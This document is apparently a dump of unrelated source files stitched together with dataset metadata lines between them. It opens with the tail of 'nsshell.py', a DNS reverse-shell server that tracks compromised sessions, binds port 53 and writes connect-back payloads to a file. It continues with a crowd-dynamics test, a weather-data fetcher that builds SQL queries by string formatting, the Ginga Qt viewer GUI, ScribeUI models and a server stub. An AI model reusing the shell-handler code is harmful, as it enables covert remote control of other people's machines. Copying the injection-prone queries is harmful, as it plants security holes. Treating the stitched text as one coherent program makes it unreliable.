exit_status = self.session.get_data(sess_id, 'exit')
user = self.session.get_data(sess_id, 'user')
if not exit_status and user:
host = self.session.get_data(sess_id, 'host')
direct = self.session.get_data(sess_id, 'direct')
last_req = self.session.get_data(sess_id, 'last_req')
direct = 'direct' if (direct) else 'UDP 53 filtered'
print(sess_id + " - "+ str(self.session.get_data(sess_id, 'last_req')) + " - "+user+"@" + host + " - " +\
self.session.get_data(sess_id, 'payload') + " - " + direct)
if not printed:
print("no active sessions")
def do_clear(self):
"""clear: Clears the console"""
os.system("clear")
def do_exit(self, sess_id):
"""exit: exit this session, "exit all" will exit all sessions"""
if sess_id.lower() == "all":
for sess_id in self.session.list_sessions():
self.session.send_exit(sess_id)
self.current_session = False
self.session.current_session = False
else:
self.session.send_exit(sess_id)
if self.current_session == sess_id:
self.current_session = False
self.session.current_session = False
class Logger(object):
log_files = {}
@staticmethod
def background_log(sess_id, host, user, data, retry = 3):
sess_id = re.sub(r'\W+', '', sess_id)
host = re.sub(r'\W+', '', host)
user = re.sub(r'\W+', '', user)
log_path = config.LOG_DIR+"/"+sess_id+"_"+host+"_"+user+".log"
try:
if log_path not in Logger.log_files:
Logger.log_files[log_path] = open(log_path, "a")
Logger.log_files[log_path].write(data)
Logger.log_files[log_path].flush()
except: # TODO make this more specific, eating all errors bad
#just to be safe, lets make sure we wrote it.
if retry >= 1:
return Logger.background_log(sess_id, host, user, data, retry - 1)
def log(sess_id, host, user, data):
reactor.callInThread(Logger.background_log, sess_id, host, user, data)
def main():
"""
Run the server.
"""
argparser = ArgumentParser(description='nsshell.py HOST IP\nnsshell.py localhost 127.0.0.1', formatter_class=RawTextHelpFormatter)
argparser.add_argument('hostname',
default=str(subprocess.check_output(['hostname','-f'])).strip(),
nargs='?',
help='hostname of the publicly facing server, for debugging=localhost',
type=str)
argparser.add_argument('ip',
default='',
nargs='?',
help='ip addr of publicly facing server',
type=str)
config_args = argparser.add_argument_group(title='Config Args')
config_args.add_argument('--logdir',
action='store',
default='',
dest='logdir',
help='set logging directory')
if len(sys.argv) <= 2:
argparser.print_help()
sys.exit(1)
args = vars(argparser.parse_args())
# check to see if logging has been disabled
if args['logdir'].lower() in config.CLI_NO:
config.LOG_DIR = None
elif args['logdir']:
config.LOG_DIR = os.path.realpath(args['logdir'])
if config.LOG_DIR and not os.path.exists(config.LOG_DIR):
os.makedirs(config.LOG_DIR)
hostname = args['hostname']
ip = args['ip']
if len(ip) > 15:
sys.stderr.write("Must be ipv4:"+args['ip'])
sys.exit(1)
print("Starting nsshell - DO NOT DISTRIBUTE")
print("using hostname: " + hostname)
print("using IP: " + ip)
if config.LOG_DIR:
print("logging to: " + config.LOG_DIR)
load = loader(hostname, ip)
payload_count = len(load.payloads)
#payload_count is used to prevent session IDs and payloads from sharing the same keys.
sessionhandler = session_handler(payload_count)
sr = ShellResolver(sessionhandler, ip, hostname, load)
console_handler = Console()
console_handler.setSession(sessionhandler)
#The torando DNS server will throw a harmless exception when scanned by nmap.
#We are overriding gotResolverResponse with a lambda to avoid this exception:
#File "/usr/lib/python2.7/dist-packages/twisted/names/server.py", line 263, in gotResolverResponse
# def gotResolverResponse(self, (ans, auth, add), protocol, message, address):
#exceptions.TypeError: 'NoneType' object is not iterable
server.gotResolverResponse = lambda *x: False
factory = server.DNSServerFactory(
clients=[sr]
#We don't want to be an open resolver:
#, client.Resolver(resolv='/etc/resolv.conf')]
)
protocol = dns.DNSDatagramProtocol(controller=factory)
print("binding udp/53")
reactor.listenUDP(53, protocol)
print("binding tcp/53")
reactor.listenTCP(53, factory)
with open('payloads.txt','w') as f:
for payload in load.build_payloads():
f.write(payload+"\n")
print("wrote connect-back payloads to:payloads.txt")
stdio.StandardIO(console_handler)
reactor.run()
if __name__ == '__main__':
raise SystemExit(main())
| gpl-3.0 | -888,703,662,291,551,500 | 42.220109 | 174 | 0.536655 | false |
jaantollander/CrowdDynamics | crowddynamics/core/tests/test_quantities.py | 1 | 1070 | import numpy as np
import pytest
from hypothesis.control import assume
from hypothesis.core import given
from scipy.spatial.qhull import QhullError, Voronoi
from crowddynamics.core.quantities import density_voronoi_1
from crowddynamics.testing import reals
def all_unique(data: np.ndarray) -> bool:
"""Test that all data rows have unique data"""
ncols = data.shape[1]
dtype = data.dtype.descr * ncols
struct = data.view(dtype)
return len(np.unique(struct)) == len(data)
def does_not_raise_Qhull_error(points):
"""Test that Voronoi tesselation does raise errors"""
try:
vor = Voronoi(points)
return True
except QhullError:
return False
@pytest.mark.skip('Fixme')
# @given(points=reals(1, 10, shape=(3, 2)))
@given(points=reals(1, 10, shape=(10, 2)))
# @given(points=reals(1, 10, shape=(100, 2)))
def test_density_voronoi_1(points):
assume(does_not_raise_Qhull_error(points))
assume(all_unique(points))
cell_size = 0.1
density = density_voronoi_1(points, cell_size=cell_size)
assert True
| gpl-3.0 | -7,790,188,025,380,964,000 | 27.157895 | 60 | 0.696262 | false |
mivp/tessterrain | examples/geo_weather/fetch_weather_data.py | 1 | 3521 | #!/usr/bin/env python
import csv
import json
import requests
import numpy as np
import sqlite3
csv_filename = "testdata/vic_usgs/south_west_stations.csv"
db_filename = "testdata/vic_usgs/south_west_stations.db"
# open database
conn = sqlite3.connect(db_filename)
c = conn.cursor()
# Create stations table
c.execute('''CREATE TABLE IF NOT EXISTS stations
(id text, short text, name text, lon real, lat real, height real, json text, UNIQUE(id))''')
# Create observations table
c.execute('''CREATE TABLE IF NOT EXISTS observations
(id text, local_date_time text, local_date_time_full text,
apparent_t real, delta_t real, air_temp real, rain_trace text, rel_hum real, wind_dir text, wind_spd_kmh real,
UNIQUE(id, local_date_time_full))''')
# Create time point table
c.execute('''CREATE TABLE IF NOT EXISTS time
(id text, local_date_time_full text, UNIQUE(local_date_time_full))''')
# stations
with open(csv_filename, 'rb') as csvfile:
stations = csv.DictReader(csvfile)
for station in stations:
id = station["ID"]
short = station["Short"]
name = station["Name"]
lon = float(station["Lon"])
lat = float(station["Lat"])
height = float(station["Height"])
json = station["Json"]
# Insert a row of data into stations
query_str = "INSERT OR IGNORE INTO stations VALUES ('%s', '%s', '%s', %f, %f, %f, '%s')" % (id, short, name, lon, lat, height, json)
print query_str
c.execute( query_str )
# Update observations table
r = requests.get(json)
stationdata = r.json()
data = stationdata["observations"]["data"]
nrows = len(data)
for i in range(nrows):
apparent_t = data[i]['apparent_t']
if apparent_t is None:
apparent_t = 0
delta_t = data[i]['delta_t']
if delta_t is None:
delta_t = 0
air_temp = data[i]['air_temp']
if air_temp is None:
air_temp = 0
rain_trace = data[i]['rain_trace']
if rain_trace is None:
rain_trace = ''
rel_hum = data[i]['rel_hum']
if rel_hum is None:
rel_hum = 0
wind_spd_kmh = data[i]['wind_spd_kmh']
if wind_spd_kmh is None:
wind_spd_kmh = 0
query_str = "INSERT OR IGNORE INTO observations VALUES ('%s', '%s', '%s', %0.2f, %0.2f, %0.2f, '%s', %0.2f, '%s', %0.2f)" % \
(id, data[i]['local_date_time'], data[i]['local_date_time_full'], apparent_t, delta_t, \
air_temp, rain_trace, rel_hum, data[i]['wind_dir'], wind_spd_kmh)
print query_str
c.execute(query_str)
query_str = "INSERT OR IGNORE INTO time VALUES (%s, '%s')" % (id, data[i]['local_date_time_full'])
print query_str
c.execute(query_str)
# commit the change
conn.commit()
# close database
conn.close()
# TESTING: print out to check
"""
conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute("SELECT name FROM sqlite_master WHERE type='table';")
tables = c.fetchall()
print tables
for table_name in tables:
table_name = table_name[0]
table = pd.read_sql_query("SELECT * from %s" % table_name, conn)
#print table
table.to_csv('testdata/vic_usgs/south_west_stations_' + table_name + '.csv', index_label='index')
# close database
conn.close()
""" | gpl-3.0 | -7,483,555,041,241,263,000 | 31.311927 | 140 | 0.575689 | false |
eteq/ginga | ginga/qtw/GingaQt.py | 1 | 27414 | #
# GingaQt.py -- Qt display handler for the Ginga reference viewer.
#
# Eric Jeschke ([email protected])
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
# stdlib imports
import sys, os
import traceback
import platform
import time
# GUI imports
from ginga.qtw.QtHelp import QtGui, QtCore, QFont, \
QImage, QIcon, QPixmap, MenuBar
from ginga.qtw import Widgets
# Local application imports
from ginga import cmap, imap
from ginga.misc import Bunch
from ginga.canvas.types.layer import DrawingCanvas
from ginga.util.six.moves import map, zip
moduleHome = os.path.split(sys.modules[__name__].__file__)[0]
sys.path.insert(0, moduleHome)
childDir = os.path.join(moduleHome, 'plugins')
sys.path.insert(0, childDir)
from ginga.qtw import ColorBar, Readout, PluginManagerQt, \
QtHelp, QtMain, ImageViewCanvasQt
icon_path = os.path.abspath(os.path.join(moduleHome, '..', 'icons'))
rc_file = os.path.join(moduleHome, "qt_rc")
class GingaViewError(Exception):
pass
class GingaView(QtMain.QtMain):
def __init__(self, logger, ev_quit):
# call superclass constructors--sets self.app
QtMain.QtMain.__init__(self, logger=logger, ev_quit=ev_quit)
if os.path.exists(rc_file):
self.app.setStyleSheet(rc_file)
# defaults for height and width
#self.default_height = min(900, self.screen_ht - 100)
#self.default_width = min(1600, self.screen_wd)
self.w = Bunch.Bunch()
self.iconpath = icon_path
self._lastwsname = 'channels'
self.layout = None
self._lsize = None
self._rsize = None
def set_layout(self, layout):
self.layout = layout
def get_screen_dimensions(self):
return (self.screen_wd, self.screen_ht)
def build_toplevel(self):
self.font = self.getFont('fixedFont', 12)
self.font11 = self.getFont('fixedFont', 11)
self.font14 = self.getFont('fixedFont', 14)
self.font18 = self.getFont('fixedFont', 18)
self.w.tooltips = None
QtGui.QToolTip.setFont(self.font11)
self.ds = QtHelp.Desktop()
self.ds.make_desktop(self.layout, widgetDict=self.w)
# TEMP: FIX ME!
self.gpmon.ds = self.ds
for root in self.ds.toplevels:
# add delete/destroy callbacks
## root.connect(root, QtCore.SIGNAL('closeEvent()'),
## self.quit)
#root.setApp(self)
root.setWindowTitle("Ginga")
self.ds.add_callback('all-closed', self.quit)
self.w.root = root
self.w.fscreen = None
# Create main (center) FITS image pane
self.w.vbox = self.w['main'].layout()
self.w.vbox.setSpacing(0)
self.w.mnb = self.w['channels']
if isinstance(self.w.mnb, QtGui.QMdiArea):
self.w.mnb.subWindowActivated.connect(self.page_switch_mdi_cb)
self.w.mnb.set_mode('tabs')
else:
self.w.mnb.currentChanged.connect(self.page_switch_cb)
# readout
if self.settings.get('share_readout', True):
self.readout = self.build_readout()
self.add_callback('field-info', self.readout_cb, self.readout, None)
rw = self.readout.get_widget()
self.w.vbox.addWidget(rw, stretch=0)
# bottom buttons
plw = QtGui.QWidget()
hbox = QtGui.QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
hbox.setSpacing(2)
plw.setLayout(hbox)
cbox1 = QtHelp.ComboBox()
self.w.channel = cbox1
cbox1.setToolTip("Select a channel")
cbox1.activated.connect(self.channel_select_cb)
hbox.addWidget(cbox1, stretch=0)
opmenu = QtGui.QMenu()
self.w.operation = opmenu
btn = QtGui.QPushButton("Operation")
btn.clicked.connect(self.invoke_op_cb)
btn.setToolTip("Invoke operation")
self.w.opbtn = btn
hbox.addWidget(btn, stretch=0)
w = QtGui.QWidget()
self.w.optray = QtGui.QHBoxLayout()
self.w.optray.setContentsMargins(0, 0, 0, 0)
self.w.optray.setSpacing(2)
w.setLayout(self.w.optray)
hbox.addWidget(w, stretch=1, alignment=QtCore.Qt.AlignLeft)
self.w.vbox.addWidget(plw, stretch=0)
# Add colormap bar
cbar = self.build_colorbar()
self.w.vbox.addWidget(cbar, stretch=0)
menuholder = self.w['menu']
# NOTE: menubar is a ginga.Widgets wrapper
self.w.menubar = self.add_menus(menuholder)
self.add_dialogs()
statusholder = self.w['status']
self.add_statusbar(statusholder)
self.w.root.show()
def getPluginManager(self, logger, fitsview, ds, mm):
return PluginManagerQt.PluginManager(logger, fitsview, ds, mm)
def _name_mangle(self, name, pfx=''):
newname = []
for c in name.lower():
if not (c.isalpha() or c.isdigit() or (c == '_')):
newname.append('_')
else:
newname.append(c)
return pfx + ''.join(newname)
def add_menus(self, holder):
menubar = Widgets.Menubar()
self.menubar = menubar
menubar_w = menubar.get_widget()
# NOTE: Special hack for Mac OS X, otherwise the menus
# do not get added to the global OS X menu
macos_ver = platform.mac_ver()[0]
if len(macos_ver) > 0:
self.w['top'].layout().addWidget(menubar_w, stretch=0)
else:
holder.layout().addWidget(menubar_w, stretch=1)
# create a File pulldown menu, and add it to the menu bar
filemenu = menubar.add_name("File")
item = filemenu.add_name("Load Image")
item.add_callback('activated', lambda *args: self.gui_load_file())
item = filemenu.add_name("Remove Image")
item.add_callback("activated", lambda *args: self.remove_current_image())
filemenu.add_separator()
item = filemenu.add_name("Quit")
item.add_callback('activated', lambda *args: self.windowClose())
# create a Channel pulldown menu, and add it to the menu bar
chmenu = menubar.add_name("Channel")
item = chmenu.add_name("Add Channel")
item.add_callback('activated', lambda *args: self.gui_add_channel())
item = chmenu.add_name("Add Channels")
item.add_callback('activated', lambda *args: self.gui_add_channels())
item = chmenu.add_name("Delete Channel")
item.add_callback('activated', lambda *args: self.gui_delete_channel())
# create a Window pulldown menu, and add it to the menu bar
wsmenu = menubar.add_name("Workspace")
item = wsmenu.add_name("Add Workspace")
item.add_callback('activated', lambda *args: self.gui_add_ws())
item = wsmenu.add_name("Take Tab")
item.add_callback('activated',
lambda *args: self.ds.take_tab_cb(self.w.mnb,
args))
if isinstance(self.w.mnb, QtGui.QMdiArea):
item = wsmenu.add_name("Panes as Tabs")
item.add_callback(lambda *args: self.tabstoggle_cb())
item.get_widget().setCheckable(True)
is_tabs = (self.w.mnb.get_mode() == 'tabs')
item.get_widget().setChecked(is_tabs)
item = wsmenu.add_name("Tile Panes")
item.add_callback('activated', lambda *args: self.tile_panes_cb())
item = wsmenu.add_name("Cascade Panes")
item.add_callback(lambda *args: self.cascade_panes_cb())
# # create a Option pulldown menu, and add it to the menu bar
# optionmenu = menubar.add_name("Option")
# create a Plugins pulldown menu, and add it to the menu bar
plugmenu = menubar.add_name("Plugins")
self.w.menu_plug = plugmenu
# create a Help pulldown menu, and add it to the menu bar
helpmenu = menubar.add_name("Help")
item = helpmenu.add_name("About")
item.add_callback('activated', lambda *args: self.banner(raiseTab=True))
item = helpmenu.add_name("Documentation")
item.add_callback('activated', lambda *args: self.help())
return menubar
def add_dialogs(self):
filesel = QtGui.QFileDialog(self.w.root, directory=os.curdir)
filesel.setFileMode(QtGui.QFileDialog.ExistingFile)
filesel.setViewMode(QtGui.QFileDialog.Detail)
self.filesel = filesel
def add_plugin_menu(self, name):
# NOTE: self.w.menu_plug is a ginga.Widgets wrapper
item = self.w.menu_plug.add_name("Start %s" % (name))
item.add_callback('activated',
lambda *args: self.start_global_plugin(name))
def add_statusbar(self, holder):
self.w.status = QtGui.QStatusBar()
holder.layout().addWidget(self.w.status, stretch=1)
def fullscreen(self):
self.w.root.showFullScreen()
def normalsize(self):
self.w.root.showNormal()
def maximize(self):
self.w.root.showMaximized()
def toggle_fullscreen(self):
if not self.w.root.isFullScreen():
self.w.root.showFullScreen()
else:
self.w.root.showNormal()
def build_fullscreen(self):
w = self.w.fscreen
self.w.fscreen = None
if w is not None:
w.destroy()
return
# Get image from current focused channel
chinfo = self.get_channelInfo()
fitsimage = chinfo.fitsimage
settings = fitsimage.get_settings()
rgbmap = fitsimage.get_rgbmap()
root = QtHelp.TopLevel()
vbox = QtGui.QVBoxLayout()
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
root.setLayout(vbox)
fi = self.build_viewpane(settings, rgbmap=rgbmap)
iw = fi.get_widget()
vbox.addWidget(iw, stretch=1)
# Get image from current focused channel
image = fitsimage.get_image()
if image is None:
return
fi.set_image(image)
# Copy attributes of the frame
fitsimage.copy_attributes(fi,
[#'transforms',
#'cutlevels',
'rgbmap'])
root.showFullScreen()
self.w.fscreen = root
def add_operation(self, title):
opmenu = self.w.operation
item = QtGui.QAction(title, opmenu)
item.triggered.connect(lambda: self.start_operation_cb(title))
opmenu.addAction(item)
self.operations.append(title)
####################################################
# THESE METHODS ARE CALLED FROM OTHER MODULES & OBJECTS
####################################################
def make_button(self, name, wtyp, icon=None, tooltip=None):
picon = None
if icon:
iconfile = os.path.join(self.iconpath, '%s.png' % icon)
try:
image = QImage(iconfile)
pixmap = QPixmap.fromImage(image)
picon = QIcon(pixmap)
qsize = QtCore.QSize(24, 24)
except Exception as e:
self.logger.error("Error loading icon '%s': %s" % (
iconfile, str(e)))
if wtyp == 'button':
if picon:
w = Widgets.Button()
_w = w.get_widget()
_w.setIconSize(qsize)
_w.setIcon(picon)
else:
w = Widgets.Button(name)
elif wtyp == 'toggle':
if picon:
w = Widgets.ToggleButton()
_w = w.get_widget()
_w.setIconSize(qsize)
_w.setIcon(picon)
else:
w = Widgets.ToggleButton()
return w
def set_titlebar(self, text):
self.w.root.setWindowTitle("Ginga: %s" % text)
def build_readout(self):
readout = Readout.Readout(-1, 20)
# NOTE: Special hack for Mac OS X, otherwise the font on the readout
# is too small
macos_ver = platform.mac_ver()[0]
if len(macos_ver) > 0:
readout.set_font(self.font14)
else:
readout.set_font(self.font11)
return readout
def build_colorbar(self):
cbar = ColorBar.ColorBar(self.logger)
cbar.set_cmap(self.cm)
cbar.set_imap(self.im)
cbar.resize(700, 15)
#cbar.show()
self.colorbar = cbar
self.add_callback('active-image', self.change_cbar, cbar)
cbar.add_callback('motion', self.cbar_value_cb)
fr = QtGui.QFrame()
fr.setContentsMargins(0, 0, 0, 0)
layout = QtGui.QHBoxLayout()
fr.setLayout(layout)
layout.setContentsMargins(0, 0, 0, 0)
fr.setFrameStyle(QtGui.QFrame.Box | QtGui.QFrame.Raised)
layout.addWidget(cbar, stretch=1)
return fr
def build_viewpane(self, settings, rgbmap=None):
# instantiate bindings loaded with users preferences
bclass = ImageViewCanvasQt.ImageViewCanvas.bindingsClass
bindprefs = self.prefs.createCategory('bindings')
bd = bclass(self.logger, settings=bindprefs)
fi = ImageViewCanvasQt.ImageViewCanvas(logger=self.logger,
rgbmap=rgbmap,
settings=settings,
bindings=bd)
canvas = DrawingCanvas()
canvas.enable_draw(False)
fi.set_canvas(canvas)
fi.set_follow_focus(settings.get('follow_focus', True))
fi.enable_auto_orient(True)
fi.add_callback('motion', self.motion_cb)
fi.add_callback('cursor-down', self.force_focus_cb)
fi.add_callback('key-press', self.keypress)
fi.add_callback('drag-drop', self.dragdrop)
fi.ui_setActive(True)
for name in ['cuts']:
settings.getSetting(name).add_callback('set',
self.change_range_cb, fi, self.colorbar)
bd = fi.get_bindings()
bd.enable_all(True)
rgbmap = fi.get_rgbmap()
rgbmap.add_callback('changed', self.rgbmap_cb, fi)
fi.set_bg(0.2, 0.2, 0.2)
return fi
def add_viewer(self, name, settings,
use_readout=False, workspace=None):
vwidget = QtGui.QWidget()
vbox = QtGui.QVBoxLayout()
vbox.setContentsMargins(1, 1, 1, 1)
vbox.setSpacing(0)
vwidget.setLayout(vbox)
fi = self.build_viewpane(settings)
iw = fi.get_widget()
fi.add_callback('focus', self.focus_cb, name)
vbox.addWidget(iw, stretch=1)
fi.set_name(name)
if use_readout:
readout = self.build_readout()
# TEMP: hack
readout.fitsimage = fi
fi.add_callback('image-set', self.readout_config, readout)
self.add_callback('field-info', self.readout_cb, readout, name)
rw = readout.get_widget()
rw.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed,
QtGui.QSizePolicy.Fixed))
vbox.addWidget(rw, stretch=0, alignment=QtCore.Qt.AlignLeft)
else:
readout = None
# Add a page to the specified notebook
if not workspace:
workspace = 'channels'
self.ds.add_tab(workspace, vwidget, 1, name)
self.update_pending()
bnch = Bunch.Bunch(fitsimage=fi, view=iw, container=vwidget,
readout=readout, workspace=workspace)
return bnch
def gui_add_channel(self, chname=None):
if not chname:
self.chncnt += 1
chname = "Image%d" % self.chncnt
lbl = QtGui.QLabel('New channel name:')
ent = QtGui.QLineEdit()
ent.setText(chname)
lbl2 = QtGui.QLabel('Workspace:')
cbox = QtHelp.ComboBox()
names = self.ds.get_wsnames()
try:
idx = names.index(self._lastwsname)
except:
idx = 0
for name in names:
cbox.append_text(name)
cbox.setCurrentIndex(idx)
dialog = QtHelp.Dialog("Add Channel",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.add_channel_cb(w, rsp, ent, cbox, names))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(lbl, stretch=0)
layout.addWidget(ent, stretch=0)
layout.addWidget(lbl2, stretch=0)
layout.addWidget(cbox, stretch=0)
dialog.show()
def gui_add_channels(self):
captions = (('Prefix', 'entry'),
('Number', 'spinbutton'),
('Workspace', 'combobox'),
)
w, b = QtHelp.build_info(captions)
b.prefix.setText("Image")
b.number.setRange(1, 12)
b.number.setSingleStep(1)
b.number.setValue(1)
cbox = b.workspace
names = self.ds.get_wsnames()
try:
idx = names.index('channels')
except:
idx = 0
for name in names:
cbox.append_text(name)
cbox.setCurrentIndex(idx)
dialog = QtHelp.Dialog("Add Channels",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.add_channels_cb(w, rsp,
b, names))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(w, stretch=1)
dialog.show()
def gui_delete_channel(self):
chinfo = self.get_channelInfo()
chname = chinfo.name
lbl = QtGui.QLabel("Really delete channel '%s' ?" % (chname))
dialog = QtHelp.Dialog("Delete Channel",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.delete_channel_cb(w, rsp, chname))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(lbl, stretch=0)
dialog.show()
def gui_add_ws(self):
captions = (('Workspace name', 'entry'),
('Workspace type', 'combobox'),
('In workspace', 'combobox'),
('Channel prefix', 'entry'),
('Number of channels', 'spinbutton'),
('Share settings', 'entry'),
)
w, b = QtHelp.build_info(captions)
self.wscount += 1
wsname = "ws%d" % (self.wscount)
b.workspace_name.setText(wsname)
b.share_settings.setMaxLength(60)
cbox = b.workspace_type
cbox.append_text("Tabs")
cbox.append_text("Grid")
cbox.append_text("MDI")
cbox.setCurrentIndex(1)
cbox = b.in_workspace
names = self.ds.get_wsnames()
names.insert(0, 'top level')
try:
idx = names.index('channels')
except:
idx = 0
for name in names:
cbox.append_text(name)
cbox.setCurrentIndex(idx)
b.channel_prefix.setText("Image")
spnbtn = b.number_of_channels
spnbtn.setRange(0, 12)
spnbtn.setSingleStep(1)
spnbtn.setValue(4)
dialog = QtHelp.Dialog("Add Workspace",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.new_ws_cb(w, rsp, b, names))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(w, stretch=1)
dialog.show()
def new_ws_cb(self, w, rsp, b, names):
w.close()
wsname = str(b.workspace_name.text())
idx = b.workspace_type.currentIndex()
if rsp == 0:
return
d = { 0: 'nb', 1: 'grid', 2: 'mdi' }
wstype = d[idx]
idx = b.in_workspace.currentIndex()
inSpace = names[idx]
self.add_workspace(wsname, wstype, inSpace=inSpace)
chpfx = b.channel_prefix.text()
num = int(b.number_of_channels.value())
if num <= 0:
return
# Create a settings template to copy settings from
settings_template = self.prefs.getSettings('channel_Image')
name = "channel_template_%f" % (time.time())
settings = self.prefs.createCategory(name)
settings_template.copySettings(settings)
share_list = b.share_settings.text().split()
chbase = self.chncnt
self.chncnt += num
for i in range(num):
chname = "%s%d" % (chpfx, chbase+i)
self.add_channel(chname, workspace=wsname,
settings_template=settings_template,
settings_share=settings,
share_keylist=share_list)
return True
def gui_load_file(self, initialdir=None):
if self.filesel.exec_():
fileNames = list(map(str, list(self.filesel.selectedFiles())))
self.load_file(fileNames[0])
#self.start_operation_cb('FBrowser')
def statusMsg(self, format, *args):
if not format:
s = ''
else:
s = format % args
# remove message in about 10 seconds
self.w.status.showMessage(s, 10000)
def setPos(self, x, y):
self.w.root.move(x, y)
def setSize(self, wd, ht):
self.w.root.resize(wd, ht)
def setGeometry(self, geometry):
# Painful translation of X window geometry specification
# into correct calls to Qt
coords = geometry.replace('+', ' +')
coords = coords.replace('-', ' -')
coords = coords.split()
if 'x' in coords[0]:
# spec includes dimensions
dim = coords[0]
coords = coords[1:]
else:
# spec is position only
dim = None
if dim is not None:
# user specified dimensions
dim = list(map(int, dim.split('x')))
self.setSize(*dim)
if len(coords) > 0:
# user specified position
coords = list(map(int, coords))
self.setPos(*coords)
def collapse_pane(self, side):
"""
Toggle collapsing the left or right panes.
"""
# TODO: this is too tied to one configuration, need to figure
# out how to generalize this
hsplit = self.w['hpnl']
sizes = hsplit.sizes()
lsize, msize, rsize = sizes
if self._lsize is None:
self._lsize, self._rsize = lsize, rsize
self.logger.debug("left=%d mid=%d right=%d" % (
lsize, msize, rsize))
if side == 'right':
if rsize < 10:
# restore pane
rsize = self._rsize
msize -= rsize
else:
# minimize pane
self._rsize = rsize
msize += rsize
rsize = 0
elif side == 'left':
if lsize < 10:
# restore pane
lsize = self._lsize
msize -= lsize
else:
# minimize pane
self._lsize = lsize
msize += lsize
lsize = 0
hsplit.setSizes((lsize, msize, rsize))
def getFont(self, fontType, pointSize):
fontFamily = self.settings.get(fontType)
font = QFont(fontFamily, pointSize)
return font
####################################################
# CALLBACKS
####################################################
def windowClose(self, *args):
"""Quit the application.
"""
self.quit()
def quit(self, *args):
"""Quit the application.
"""
self.logger.info("Attempting to shut down the application...")
self.stop()
root = self.w.root
self.w.root = None
while len(self.ds.toplevels) > 0:
w = self.ds.toplevels.pop()
w.deleteLater()
def channel_select_cb(self, index):
if index >= 0:
chname = self.channelNames[index]
self.logger.debug("Channel changed, index=%d chname=%s" % (
index, chname))
self.change_channel(chname)
def add_channel_cb(self, w, rsp, ent, cbox, names):
chname = str(ent.text())
idx = cbox.currentIndex()
wsname = names[idx]
w.close()
# save name for next add
self._lastwsname = wsname
if rsp == 0:
return
self.add_channel(chname, workspace=wsname)
return True
def add_channels_cb(self, w, rsp, b, names):
chpfx = b.prefix.text()
idx = b.workspace.currentIndex()
wsname = names[idx]
num = int(b.number.value())
w.close()
if (rsp == 0) or (num <= 0):
return
chbase = self.chncnt
self.chncnt += num
for i in range(num):
chname = "%s%d" % (chpfx, chbase+i)
self.add_channel(chname, workspace=wsname)
return True
def delete_channel_cb(self, w, rsp, chname):
w.close()
if rsp == 0:
return
self.delete_channel(chname)
return True
def invoke_op_cb(self):
menu = self.w.operation
menu.popup(self.w.opbtn.mapToGlobal(QtCore.QPoint(0,0)))
def start_operation_cb(self, name):
index = self.w.channel.currentIndex()
chname = str(self.w.channel.itemText(index))
return self.start_local_plugin(chname, name, None)
def tile_panes_cb(self):
self.w.mnb.tileSubWindows()
def cascade_panes_cb(self):
self.w.mnb.cascadeSubWindows()
def tabstoggle_cb(self, useTabs):
if useTabs:
self.w.mnb.setViewMode(QtGui.QMdiArea.TabbedView)
else:
self.w.mnb.setViewMode(QtGui.QMdiArea.SubWindowView)
def page_switch_cb(self, index):
self.logger.debug("index switched to %d" % (index))
if index >= 0:
container = self.w.mnb.widget(index)
self.logger.debug("container is %s" % (container))
# Find the channel that contains this widget
chnames = self.get_channelNames()
for chname in chnames:
chinfo = self.get_channelInfo(chname)
if 'container' in chinfo and (chinfo.container == container):
fitsimage = chinfo.fitsimage
if fitsimage != self.getfocus_fitsimage():
self.logger.debug("Active channel switch to '%s'" % (
chname))
self.change_channel(chname, raisew=False)
return True
def page_switch_mdi_cb(self, w):
if w is not None:
index = self.w.mnb.indexOf(w.widget())
return self.page_switch_cb(index)
# END
| bsd-3-clause | 8,010,920,929,081,022,000 | 32.14873 | 92 | 0.546691 | false |
mapgears/scribeui | scribeui_pyramid/modules/plugins/mapcache/models.py | 1 | 1215 | # -*- coding: utf-8 -*-
from scribeui_pyramid.modules.app.sqla import Base, BaseMixin
import sqlalchemy as sa
#from . import (
# DBSession,
# Base,
# BaseMixin
#)
class Job(Base, BaseMixin):
__tablename__ = 'jobs'
id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
title = sa.Column(sa.Unicode(255), nullable=False)
status = sa.Column(sa.Integer, nullable=False)
map_id = sa.Column(sa.Integer, sa.ForeignKey('maps.id'),
nullable=False)
def __repr__(self):
return u"<Job('{0}')>".format(self.title)
class DatabaseConfig(Base, BaseMixin):
__tablename__ = 'database_configs'
id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
name = sa.Column(sa.Unicode(255), nullable=False)
type = sa.Column(sa.Unicode())
host = sa.Column(sa.Unicode())
port = sa.Column(sa.Integer)
database_name = sa.Column(sa.Unicode())
user = sa.Column(sa.Unicode())
query = sa.Column(sa.Unicode())
workspace_id = sa.Column(sa.Integer, sa.ForeignKey('workspaces.id'),
nullable=False)
def __repr__(self):
return u"<DatabaseConfig('{0}')>".format(self.name)
| mit | -287,510,345,046,188,900 | 27.255814 | 72 | 0.61893 | false |
barneygale/mcocr | app/server.py | 1 | 2546 | import StringIO
import asyncore
import socket
import urlparse
import re
import settings as settings_herp
import os
import mimetypes
import time
import traceback
import docs
import http
mimetypes.init()
response_reasons = {
200: 'OK',
304: 'Not Modified',
404: 'Not Found',
500: 'Internal Server Error',
501: 'Not Implemented'}
handlers = {}
for name in dir(docs):
if name.endswith('Doc'):
handlers[re.compile(getattr(docs, name).expression)] = getattr(docs, name)
class Server:
def __init__(self):
#Settings handler
self.settings = settings_herp.Settings()
try:
self.settings.load()
except:
self.settings.create()
def serve_forever(self):
self.client_dispatcher = self.ConnectionDispatcher(self.settings)
asyncore.loop(use_poll = False)
#######
